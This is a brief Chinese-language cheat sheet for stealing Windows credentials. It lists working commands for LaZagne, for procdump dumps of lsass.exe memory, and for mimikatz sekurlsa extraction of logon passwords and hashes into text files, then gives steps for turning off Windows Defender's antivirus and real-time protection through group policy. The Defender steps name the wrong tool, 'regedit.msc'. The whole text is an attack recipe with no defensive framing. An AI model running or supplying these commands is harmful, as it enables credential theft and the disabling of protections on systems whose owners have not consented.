1. laZagne.exe 这个比较全
laZagne.exe all >> zhuahash.txt
2. procdump.exe 抓完之后把lsass.dump 放入mimikatz.exe 同目录
procdump.exe -accepteula -ma lsass.exe lsass.dmp #32位系统
procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp #64位系统
3. mimikatz.exe
这样抓会好点
mimikatz.exe "sekurlsa::minidump lsass.dmp" "sekurlsa::logonpasswords full" exit >> hash.txt
mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" exit >> pass.txt
4. 组策略关闭Windows Defender(好像不需重启)
打开注册表,regedit.msc 依次点击打开
【本地计算机配置】-【管理模板】-【Windows组件】-【WindowsDefender防病毒】。
关闭 Microsoft Defender 防病毒”选项 启用
关闭 Microsoft Defender 实时防护”选项 启用(都看以下)